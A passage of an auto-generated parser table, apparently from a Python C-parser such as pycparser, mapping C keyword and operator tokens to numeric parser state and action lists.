9,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,360,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,445,446,458,490,491,493,494,518,520,526,528,],[46,46,-60,-62,-63,-64,-65,-66,46,46,-67,-68,-52,46,46,46,-116,-93,-29,-97,46,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,46,-84,46,46,-89,-90,-91,-92,-83,-69,46,46,-53,-94,46,-166,-152,-153,-307,-132,-133,46,-70,46,-85,46,46,46,46,46,-30,-167,46,46,46,-135,-142,-308,46,-145,-146,-130,46,46,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,46,-71,46,46,-35,-36,46,46,-154,46,-137,46,-139,-134,-143,-128,-129,-131,-202,-201,46,-218,46,-78,-80,46,-214,-215,-217,46,46,46,-31,-34,46,46,46,-155,-156,-136,-138,-144,-203,-205,46,-79,-213,-216,-32,-33,46,46,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'VOLATILE':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,79,80,81,87,96,97,98,99,101,102,103,104,105,106,107,114,115,117,118,126,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,217,218,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,360,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,445,446,458,490,491,493,494,518,520,526,528,],[47,47,-60,-62,-63,-64,-65,-66,47,47,-67,-68,-52,47,47,47,-116,-93,-29,-97,47,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,47,-84,47,47,-89,-90,-91,-92,-83,-69,47,47,-53,-94,47,-166,-152,-153,-307,-132,-133,47,-70,47,-85,47,47,47,47,47,-30,-167,47,47,47,-135,-142,-308,47,-145,-146,-130,47,47,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,47,-71,47,47,-35,-36,47,47,-154,47,-137,47,-139,-134,-143,-128,-129,-131,-202,-201,47,-218,47,-78,-80,47,-214,-215,-217,47,47,47,-31,-34,47,47,47,-155,-156,-136,-138,-144,-203,-205,47,-79,-213,-216,-32,-33,47,47,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'AUTO':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,80,81,87,98,99,101,102,103,105,106,107,115,126,131,142,144,152,153,154,155,156,157,158,159,160,161,162,210,227,228,229,238,246,250,252,253,264,265,273,282,283,284,286,287,289,351,352,361,370,371,372,375,376,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[48,48,-60,-62,-63,-64,-65,-66,48,48,-67,-68,-52,48,48,48,-116,-93,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,48,-84,48,48,-89,-90,-91,-92,-83,-69,48,-53,-94,-152,-153,-307,-132,-133,-70,48,-85,48,48,-30,-135,-308,48,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-71,-35,-36,48,48,-154,-137,-139,-134,-202,-201,-218,-78,-80,48,-214,-215,-217,-31,-34,48,48,-155,-156,-136,-138,-203,-205,48,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'REGISTER':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,80,81,87,98,99,101,102,103,105,106,107,115,126,131,142,144,152,153,154,155,156,157,158,159,160,161,162,210,227,228,229,238,246,250,252,253,264,265,273,282,283,284,286,287,289,351,352,361,370,371,372,375,376,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[49,49,-60,-62,-63,-64,-65,-66,49,49,-67,-68,-52,49,49,49,-116,-93,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,49,-84,49,49,-89,-90,-91,-92,-83,-69,49,-53,-94,-152,-153,-307,-132,-133,-70,49,-85,49,49,-30,-135,-308,49,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-71,-35,-36,49,49,-154,-137,-139,-134,-202,-201,-218,-78,-80,49,-214,-215,-217,-31,-34,49,49,-155,-156,-136,-138,-203,-205,49,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'STATIC':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,79,80,81,87,97,98,99,101,102,103,105,106,107,114,115,118,126,131,133,142,144,152,153,154,155,156,157,158,159,160,161,162,210,218,227,228,229,238,246,250,252,253,264,265,273,282,283,284,286,287,289,351,352,360,361,370,371,372,375,376,381,384,390,395,398,399,442,443,446,458,490,491,493,494,518,520,526,528,],[25,25,-60,-62,-63,-64,-65,-66,25,25,-67,-68,-52,25,25,25,-116,-93,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,25,-84,25,25,-89,-90,-91,-92,-83,-69,117,25,-53,-94,-166,-152,-153,-307,-132,-133,-70,25,-85,217,25,226,25,-30,-167,-135,-308,25,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-71,348,-35,-36,25,25,-154,-137,-139,-134,-202,-201,-218,-78,-80,25,-214,-215,-217,-31,-34,445,25,25,-155,-156,-136,-138,-203,-205,25,-79,-213,-216,-32,-33,484,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'EXTERN':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,80,81,87,98,99,101,102,103,105,106,107,115,126,131,142,144,152,153,154,155,156,157,158,159,160,161,162,210,227,228,229,238,246,250,252,253,264,265,273,282,283,284,286,287,289,351,352,361,370,371,372,375,376,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[50,50,-60,-62,-63,-64,-65,-66,50,50,-67,-68,-52,50,50,50,-116,-93,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,50,-84,50,50,-89,-90,-91,-92,-83,-69,50,-53,-94,-152,-153,-307,-132,-133,-70,50,-85,50,50,-30,-135,-308,50,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-71,-35,-36,50,50,-154,-137,-139,-134,-202,-201,-218,-78,-80,50,-214,-215,-217,-31,-34,50,50,-155,-156,-136,-138,-203,-205,50,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'TYPEDEF':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,80,81,87,98,99,101,102,103,105,106,107,115,126,131,142,144,152,153,154,155,156,157,158,159,160,161,162,210,227,228,229,238,246,250,252,253,264,265,273,282,283,284,286,287,289,351,352,361,370,371,372,375,376,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[51,51,-60,-62,-63,-64,-65,-66,51,51,-67,-68,-52,51,51,51,-116,-93,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,51,-84,51,51,-89,-90,-91,-92,-83,-69,51,-53,-94,-152,-153,-307,-132,-133,-70,51,-85,51,51,-30,-135,-308,51,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-71,-35,-36,51,51,-154,-137,-139,-134,-202,-201,-218,-78,-80,51,-214,-215,-217,-31,-34,51,51,-155,-156,-136,-138,-203,-205,51,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'INLINE':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,80,81,87,98,99,101,102,103,105,106,107,115,126,131,142,144,152,153,154,155,156,157,158,159,160,161,162,210,227,228,229,238,246,250,252,253,264,265,273,282,283,284,286,287,289,351,352,361,370,371,372,375,376,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[52,52,-60,-62,-63,-64,-65,-66,52,52,-67,-68,-52,52,52,52,-116,-93,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,52,-84,52,52,-89,-90,-91,-92,-83,-69,52,-53,-94,-152,-153,-307,-132,-133,-70,52,-85,52,52,-30,-135,-308,52,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-71,-35,-36,52,52,-154,-137,-139,-134,-202,-201,-218,-78,-80,52,-214,-215,-217,-31,-34,52,52,-155,-156,-136,-138,-203,-205,52,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'STRUCT':([0,2,4,5,6,7,8,9,10,13,14,15,17,18,19,22,23,25,45,46,47,48,49,50,51,52,55,58,59,61,62,77,78,80,81,82,83,84,85,86,97,101,104,105,106,107,115,128,131,133,139,140,141,143,144,146,147,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,249,251,254,264,265,271,273,282,283,284,286,287,289,328,332,335,351,352,361,370,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[53,53,-60,-62,-63,-64,-65,-66,53,-67,-68,-52,-309,-309,-309,53,-29,-97,-117,-118,-119,-95,-96,-98,-99,-100,-61,53,-84,53,53,-83,-69,53,-53,-86,-9,-10,-87,-88,-166,-307,53,-70,53,-85,53,53,-30,-167,53,53,53,-142,-308,-145,-146,53,53,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,53,-71,-35,-36,53,53,53,53,-143,-202,-201,53,-218,-78,-80,53,-214,-215,-217,53,53,53,-31,-34,53,53,-144,-203,-205,53,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'UNION':([0,2,4,5,6,7,8,9,10,13,14,15,17,18,19,22,23,25,45,46,47,48,49,50,51,52,55,58,59,61,62,77,78,80,81,82,83,84,85,86,97,101,104,105,106,107,115,128,131,133,139,140,141,143,144,146,147,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,249,251,254,264,265,271,273,282,283,284,286,287,289,328,332,335,351,352,361,370,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[54,54,-60,-62,-63,-64,-65,-66,54,-67,-68,-52,-309,-309,-309,54,-29,-97,-117,-118,-119,-95,-96,-98,-99,-100,-61,54,-84,54,54,-83,-69,54,-53,-86,-9,-10,-87,-88,-166,-307,54,-70,54,-85,54,54,-30,-167,54,54,54,-142,-308,-145,-146,54,54,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,54,-71,-35,-36,54,54,54,54,-143,-202,-201,54,-218,-78,-80,54,-214,-215,-217,54,54,54,-31,-34,54,54,-144,-203,-205,54,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'LBRACE':([10,14,15,23,31,32,53,54,56,57,58,59,62,77,78,81,98,99,101,102,103,106,107,109,113,130,131,144,152,153,154,155,156,157,158,159,160,161,162,172,215,227,228,264,265,267,272,273,282,283,286,287,289,338,339,340,351,352,381,382,384,386,395,398,399,432,434,442,443,458,459,460,461,463,464,472,473,476,477,490,491,493,494,507,509,518,520,522,525,526,528,],[-309,-68,-52,-29,101,101,-140,-141,101,-7,-8,-84,-309,-83,-69,-53,101,101,-307,101,101,101,-85,101,101,101,-30,-308,101,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,101,-309,-35,-36,-202,-201,101,101,-218,101,-80,-214,-215,-217,-11,101,-12,-31,-34,-203,101,-205,101,-79,-213,-216,-309,-182,-32,-33,-204,101,101,-309,101,101,101,101,101,-11,-206,-80,-208,-209,101,-309,-207,-210,101,101,-212,-211,]),'RBRACE':([14,77,78,101,104,106,127,136,137,138,139,140,141,143,144,146,147,150,151,152,153,154,155,156,157,158,159,160,161,162,179,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,214,215,244,245,247,249,251,254,264,265,269,270,273,282,283,286,287,289,325,326,327,329,330,331,333,334,336,337,338,373,374,377,381,384,387,395,398,399,400,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,431,432,433,458,462,469,470,473,475,490,491,492,493,494,498,502,508,509,513,518,519,520,526,528,],[-68,-83,-69,-307,144,-309,-294,144,-157,-160,144,144,144,-142,-308,-145,-146,144,-5,-6,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-222,-257,-236,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-177,-309,144,144,-158,144,144,-143,-202,-201,-235,-257,-218,-78,-80,-214,-215,-217,-279,-280,-260,-261,-262,-263,-304,-306,144,-22,-21,-159,-161,-144,-203,-205,-287,-79,-213,-216,-223,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,-274,-275,-276,-277,-278,-178,144,-180,-204,-258,-272,-273,-264,-179,-206,-80,144,-208,-209,-237,-181,-281,144,-288,-207,-282,-210,-212,-211,]),'CASE':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,164,-308,164,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,164,-202,-201,164,164,-218,164,-80,-214,-215,-217,-203,164,-205,-79,-213,-216,-204,164,164,164,-206,-80,-208,-209,164,-207,-210,164,164,-212,-211,]),'DEFAULT':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,165,-308,165,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,165,-202,-201,165,165,-218,165,-80,-214,-215,-217,-203,165,-205,-79,-213,-216,-204,165,165,165,-206,-80,-208,-209,165,-207,-210,165,165,-212,-211,]),'IF':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,167,-308,167,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,167,-202,-201,167,167,-218,167,-80,-214,-215,-217,-203,167,-205,-79,-213,-216,-204,167,167,167,-206,-80,-208,-209,167,-207,-210,167,167,-212,-211,]),'SWITCH':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,170,-308,170,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,170,-202,-201,170,170,-218,170,-80,-214,-215,-217,-203,170,-205,-79,-213,-216,-204,170,170,170,-206,-80,-208,-209,170,-207,-210,170,170,-212,-211,]),'WHILE':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,281,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,171,-308,171,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,171,-202,-201,171,171,-218,394,171,-80,-214,-215,-217,-203,171,-205,-79,-213,-216,-204,171,171,171,-206,-80,-208,-209,171,-207,-210,171,171,-212,-211,]),'DO':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,172,-308,172,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,172,-202,-201,172,172,-218,172,-80,-214,-215,-217,-203,172,-205,-79,-213,-216,-204,172,172,172,-206,-80,-208,-209,172,-207,-210,172,172,-212,-211,]),'FOR':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,173,-308,173,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,173,-202,-201,173,173,-218,173,-80,-214,-215,-217,-203,173,-205,-79,-213,-216,-204,173,173,173,-206,-80,-208,-209,173,-207,-210,173,173,-212,-211,]),'GOTO':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,174,-308,174,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,174,-202,-201,174,174,-218,174,-80,-214,-215,-217,-203,174,-205,-79,-213,-216,-204,174,174,174,-206,-80,-208,-209,174,-207,-210,174,174,-212,-211,]),'BREAK':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,175,-308,175,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,175,-202,-201,175,175,-218,175,-80,-214,-215,-217,-203,175,-205,-79,-213,-216,-204,175,175,175,-206,-80,-208,-209,175,-207,-210,175,175,-212,-211,]),'CONTINUE':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,176,-308,176,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,176,-202,-201,176,176,-218,176,-80,-214,-215,-217,-203,176,-205,-79,-213,-216,-204,176,176,176,-206,-80,-208,-209,176,-207,-210,176,176,-212,-211,]),'RETURN':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,177,-308,177,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,177,-202,-201,177,177,-218,177,-80,-214,-215,-217,-203,177,-205,-79,-213,-216,-204,177,177,177,-206,-80,-208,-209,177,-207,-210,177,177,-212,-211,]),'PLUSPLUS':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,127,130,133,144,152,153,154,155,156,157,158,159,160,161,162,163,164,168,172,177,182,183,184,185,187,188,189,190,191,192,193,194,195,196,197,198,200,201,202,203,204,205,206,207,208,209,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,328,332,333,334,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,387,395,397,398,399,422,424,425,426,427,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,469,470,471,476,477,482,483,484,490,491,493,494,497,507,508,509,511,513,515,518,519,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,183,183,-309,183,-309,-28,-294,183,-167,-308,183,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,183,183,183,183,325,183,183,183,183,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-309,183,-309,-28,-266,183,183,183,183,183,-202,-201,183,183,183,-218,183,183,183,183,183,-80,183,-214,-215,-217,183,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,-279,-280,183,183,-304,-306,-11,183,-12,183,-266,183,183,-309,-266,183,183,-203,183,-205,183,-287,-79,183,-213,-216,-274,-275,-276,-277,-278,-309,-182,183,-309,-28,-266,-204,183,183,-309,183,183,183,183,183,-272,-273,183,183,-11,-266,183,183,-206,-80,-208,-209,183,183,-281,-309,183,-288,183,-207,-282,-210,183,183,-212,-211,]),'MINUSMINUS':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,127,130,133,144,152,153,154,155,156,157,158,159,160,161,162,163,164,168,172,177,182,183,184,185,187,188,189,190,191,192,193,194,195,196,197,198,200,201,202,203,204,205,206,207,208,209,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,328,332,333,334,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,387,395,397,398,399,422,424,425,426,427,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,469,470,471,476,477,482,483,484,490,491,493,494,497,507,508,509,511,513,515,518,519,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,184,184,-309,184,-309,-28,-294,184,-167,-308,184,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,184,184,184,184,326,184,184,184,184,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-309,184,-309,-28,-266,184,184,184,184,184,-202,-201,184,184,184,-218,184,184,184,184,184,-80,184,-214,-215,-217,184,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,-279,-280,184,184,-304,-306,-11,184,-12,184,-266,184,184,-309,-266,184,184,-203,184,-205,184,-287,-79,184,-213,-216,-274,-275,-276,-277,-278,-309,-182,184,-309,-28,-266,-204,184,184,-309,184,184,184,184,184,-272,-273,184,184,-11,-266,184,184,-206,-80,-208,-209,184,184,-281,-309,184,-288,184,-207,-282,-210,184,184,-212,-211,]),'SIZEOF':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,187,187,-309,187,-309,-28,187,-167,-308,187,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,187,187,187,187,187,187,187,187,-266,-267,-268,-265,-269,-270,-309,187,-309,-28,-266,187,187,187,187,187,-202,-201,187,187,187,-218,187,187,187,187,187,-80,187,-214,-215,-217,187,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,-11,187,-12,187,-266,187,187,-309,-266,187,187,-203,187,-205,187,-79,187,-213,-216,-309,-182,187,-309,-28,-266,-204,187,187,-309,187,187,187,187,187,187,187,-11,-266,187,187,-206,-80,-208,-209,187,187,-309,187,187,-207,-210,187,187,-212,-211,]),'AND':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,127,130,133,144,152,153,154,155,156,157,158,159,160,161,162,163,164,168,172,177,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,200,201,202,203,204,205,206,207,208,209,215,216,217,218,222,225,226,239,248,262,264,265,267,270,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,327,328,329,330,331,332,333,334,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,387,395,397,398,399,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,432,434,444,445,446,454,458,459,460,461,462,463,464,465,466,468,469,470,471,473,476,477,482,483,484,490,491,493,494,497,507,508,509,511,513,515,518,519,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,191,191,-309,191,-309,-28,-294,191,-167,-308,191,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,191,191,191,191,-257,316,-259,191,191,191,-238,191,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-309,191,-309,-28,-266,191,191,191,191,191,-202,-201,191,-257,191,191,-218,191,191,191,191,191,-80,191,-214,-215,-217,191,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,-279,-280,-260,191,-261,-262,-263,191,-304,-306,-11,191,-12,191,-266,191,191,-309,-266,191,191,-203,191,-205,191,-287,-79,191,-213,-216,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,316,316,316,316,-274,-275,-276,-277,-278,-309,-182,191,-309,-28,-266,-204,191,191,-309,-258,191,191,191,191,191,-272,-273,191,-264,191,-11,-266,191,191,-206,-80,-208,-209,191,191,-281,-309,191,-288,191,-207,-282,-210,191,191,-212,-211,]),'PLUS':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,127,130,133,144,152,153,154,155,156,157,158,159,160,161,162,163,164,168,172,177,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,200,201,202,203,204,205,206,207,208,209,215,216,217,218,222,225,226,239,248,262,264,265,267,270,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,327,328,329,330,331,332,333,334,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,387,395,397,398,399,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,432,434,444,445,446,454,458,459,460,461,462,463,464,465,466,468,469,470,471,473,476,477,482,483,484,490,491,493,494,497,507,508,509,511,513,515,518,519,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,189,189,-309,189,-309,-28,-294,189,-167,-308,189,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,189,189,189,189,-257,306,-259,189,189,189,-238,189,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-309,189,-309,-28,-266,189,189,189,189,189,-202,-201,189,-257,189,189,-218,189,189,189,189,189,-80,189,-214,-215,-217,189,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,-279,-280,-260,189,-261,-262,-263,189,-304,-306,-11,189,-12,189,-266,189,189,-309,-266,189,189,-203,189,-205,189,-287,-79,189,-213,-216,-239,-240,-241,-242,-243,306,306,306,306,306,306,306,306,306,306,306,306,306,-274,-275,-276,-277,-278,-309,-182,189,-309,-28,-266,-204,189,189,-309,-258,189,189,189,189,189,-272,-273,189,-264,189,-11,-266,189,189,-206,-80,-208,-209,189,189,-281,-309,189,-288,189,-207,-282,-210,189,189,-212,-211,]),'MINUS':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,127,130,133,144,152,153,154,155,156,157,158,159,160,161,162,163,164,168,172,177,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,200,201,202,203,204,205,206,207,208,209,215,216,217,218,222,225,226,239,248,262,264,265,267,270,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,327,328,329,330,331,332,333,334,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,387,395,397,398,399,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,432,434,444,445,446,454,458,459,460,461,462,463,464,465,466,468,469,470,471,473,476,477,482,483,484,490,491,493,494,497,507,508,509,511,513,515,518,519,520,522,525,526,528,]